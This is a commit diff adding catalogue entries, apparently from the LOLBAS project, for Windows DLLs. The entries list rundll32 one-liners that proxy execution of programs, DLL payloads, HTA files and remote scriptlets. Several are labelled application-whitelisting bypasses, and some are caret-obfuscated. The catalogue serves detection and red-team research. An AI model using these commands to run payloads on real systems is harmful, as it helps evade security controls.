Updated Libs

Advpack.md

@@ -0,0 +1,28 @@
+---
+name: advpack.dll
+description: Legitimately used for installing of software and drivers.
+functions:
+  awl-bypass:
+    - description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
+      code: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
+    - description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
+      code: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
+  execute:
+    - description: Launch executable by calling the RegisterOCX function.
+      code: rundll32.exe advpack.dll,RegisterOCX calc.exe
+    - description: Launch command line by calling the RegisterOCX function.
+      code: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
+    - description: Launch a DLL payload by calling the RegisterOCX function.
+      code: rundll32.exe advpack.dll,RegisterOCX test.dll
+resources:
+    - resource: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
+    - resource: https://twitter.com/ItsReallyNick/status/967859147977850880
+    - resource: https://twitter.com/bohops/status/974497123101179904
+    - resource: https://twitter.com/moriarty_meng/status/977848311603380224
+    - resource: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
+    - resource: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
+fullpath: 
+    - path: c:\windows\system32\advpack.dll
+    - path: c:\windows\syswow64\advpack.dll
+notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd), Nick Carr - @ItsReallyNick
+---

Ieadvpack.md

@@ -0,0 +1,27 @@
+---
+name: ieadvpack.dll
+description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.
+functions:
+  awl-bypass:
+    - description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
+      code: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
+    - description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
+      code: rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,
+  execute:
+    - description: Launch executable by calling the RegisterOCX function.
+      code: rundll32.exe iedvpack.dll,RegisterOCX calc.exe
+    - description: Launch command line by calling the RegisterOCX function.
+      code: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
+    - description: Launch a DLL payload by calling the RegisterOCX function.
+      code: rundll32.exe iedvpack.dll,RegisterOCX test.dll
+resources:
+    - resource: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
+    - resource: https://twitter.com/pabraeken/status/991695411902599168
+    - resource: https://twitter.com/0rbz_/status/974472392012689408
+    - resource: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
+    - resource: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
+fullpath: 
+    - path: c:\windows\system32\ieadvpack.dll
+    - path: c:\windows\syswow64\ieadvpack.dll
+notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd), Nick Carr - @ItsReallyNick
+---

Ieframe.md

@@ -0,0 +1,20 @@
+---
+name: ieframe.dll
+description: Internet Browser DLL for translating HTML code.
+functions:
+  execute:
+    - description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
+      code: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
+    - description: Launch an executable payload via proxy through a renamed URL (information) file by calling OpenURL.
+      code: rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz
+resources:
+    - resource: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
+    - resource: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
+    - resource: https://twitter.com/bohops/status/997690405092290561
+    - resource: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
+    - resource: https://windows10dll.nirsoft.net/ieframe_dll.html
+fullpath: 
+    - path: c:\windows\system32\ieframe.dll
+    - path: c:\windows\syswow64\ieframe.dll
+notes: Thanks to Adam - @hexacorn, Jimmy - @bohops
+---

Mshtml.md

@@ -0,0 +1,15 @@
+---
+name: mshtml.dll
+description: Microsoft HTML Viewer.
+functions:
+  execute:
+    - description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).
+      code: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
+resources:
+    - resource: https://twitter.com/pabraeken/status/998567549670477824
+    - resource: https://windows10dll.nirsoft.net/mshtml_dll.html
+fullpath: 
+    - path: c:\windows\system32\mshtml.dll
+    - path: c:\windows\syswow64\mshtml.dll
+notes: Thanks to Pierre-Alexandre Braeken - @pabraeken.
+---

Pcwutl.md

@@ -0,0 +1,15 @@
+---
+name: pcwutl.dll
+description: Program Compatibility Troubleshooter Helper
+functions:
+  execute:
+    - description: Launch executable by calling the LaunchApplication function.
+      code: rundll32.exe pcwutl.dll,LaunchApplication calc.exe
+resources:
+    - resource: https://twitter.com/harr0ey/status/989617817849876488
+    - resource: https://windows10dll.nirsoft.net/pcwutl_dll.html
+fullpath: 
+    - path: c:\windows\system32\pcwutl.dll
+    - path: c:\windows\syswow64\pcwutl.dll
+notes: Thanks to Matt harr0ey - @harr0ey.
+---

Setupapi.md

@@ -0,0 +1,20 @@
+---
+name: setupapi.dll
+description: Windows Setup Application Programming Interface
+functions:
+  awl-bypass:
+    - description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
+      code: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf
+  execute:
+    - description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
+      code: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
+resources:
+    - resource: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
+    - resource: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
+    - resource: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
+    - resource: https://windows10dll.nirsoft.net/setupapi_dll.html
+fullpath: 
+    - path: c:\windows\system32\setupapi.dll
+    - path: c:\windows\syswow64\setupapi.dll
+notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet).
+---

Shdocvw.md

@@ -0,0 +1,20 @@
+---
+name: shdocvw.dll
+description: Shell Doc Object and Control Library.
+functions:
+  execute:
+    - description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
+      code: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
+    - description: Launch an executable payload via proxy through a renamed URL (information) file by calling OpenURL.
+      code: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz"
+resources:
+    - resource: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
+    - resource: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
+    - resource: https://twitter.com/bohops/status/997690405092290561
+    - resource: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
+    - resource: https://windows10dll.nirsoft.net/shdocvw_dll.html
+fullpath: 
+    - path: c:\windows\system32\shdocvw.dll
+    - path: c:\windows\syswow64\shdocvw.dll
+notes: Thanks to Adam - @hexacorn, Jimmy - @bohops
+---

Shell32.md

@@ -0,0 +1,22 @@
+---
+name: shell32.dll
+description: Windows Shell Common Dll
+functions:
+  execute:
+    - description: Launch DLL payload.
+      code: rundll32.exe shell32.dll,Control_RunDLL payload.dll
+    - description: Launch executable payload.
+      code: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
+    - description: Launch executable payload with arguments.
+      code: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"    
+resources:
+    - resource: https://twitter.com/Hexacorn/status/885258886428725250
+    - resource: https://twitter.com/pabraeken/status/991768766898941953
+    - resource: https://twitter.com/mattifestation/status/776574940128485376
+    - resource: https://twitter.com/KyleHanslovan/status/905189665120149506
+    - resource: https://windows10dll.nirsoft.net/shell32_dll.html
+fullpath: 
+    - path: c:\windows\system32\shell32.dll
+    - path: c:\windows\syswow64\shell32.dll
+notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)
+---

Syssetup.md

@@ -0,0 +1,23 @@
+---
+name: syssetup.dll
+description: Windows NT System Setup 
+functions:
+  awl-bypass:
+    - description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
+      code: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf   
+  execute:
+    - description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
+      code: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF
+resources:
+    - resource: https://twitter.com/pabraeken/status/994392481927258113
+    - resource: https://twitter.com/harr0ey/status/975350238184697857
+    - resource: https://twitter.com/bohops/status/975549525938135040
+    - resource: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
+    - resource: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
+    - resource: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
+    - resource: https://windows10dll.nirsoft.net/syssetup_dll.html
+fullpath: 
+    - path: c:\windows\system32\syssetup.dll
+    - path: c:\windows\syswow64\syssetup.dll
+notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)
+---

Url.md

@@ -0,0 +1,29 @@
+---
+name: url.dll
+description: Internet Shortcut Shell Extension DLL.
+functions:
+  execute:
+    - description: Launch a HTML application payload by calling OpenURL.
+      code: rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta"
+    - description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
+      code: rundll32.exe url.dll,OpenURL "C:\\test\\calc.url"
+    - description: Launch an executable payload by calling OpenURL (obfuscated).
+      code: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
+    - description: Launch an executable payload by calling FileProtocolHandler.
+      code: rundll32.exe url.dll,FileProtocolHandler calc.exe
+    - description: Launch a HTML application payload by calling FileProtocolHandler.
+      code: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
+    - description: Launch an executable payload by calling FileProtocolHandler (obfuscated).
+      code: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
+resources:
+    - resource: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
+    - resource: https://twitter.com/DissectMalware/status/995348436353470465
+    - resource: https://twitter.com/bohops/status/974043815655956481
+    - resource: https://twitter.com/yeyint_mth/status/997355558070927360
+    - resource: https://twitter.com/Hexacorn/status/974063407321223168
+    - resource: https://windows10dll.nirsoft.net/url_dll.html
+fullpath: 
+    - path: c:\windows\system32\url.dll
+    - path: c:\windows\syswow64\url.dll
+notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation)
+---

Zipfldr.md

@@ -0,0 +1,18 @@
+---
+name: zipfldr.dll
+description: Compressed Folder library
+functions:
+  execute:
+    - description: Launch an executable payload by calling RouteTheCall.
+      code: rundll32.exe zipfldr.dll,RouteTheCall calc.exe
+    - description: Launch an executable payload by calling RouteTheCall (obfuscated).
+      code: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
+resources:
+    - resource: https://twitter.com/moriarty_meng/status/977848311603380224
+    - resource: https://twitter.com/bohops/status/997896811904929792
+    - resource: https://windows10dll.nirsoft.net/zipfldr_dll.html
+fullpath: 
+    - path: c:\windows\system32\zipfldr.dll
+    - path: c:\windows\syswow64\zipfldr.dll
+notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation)
+---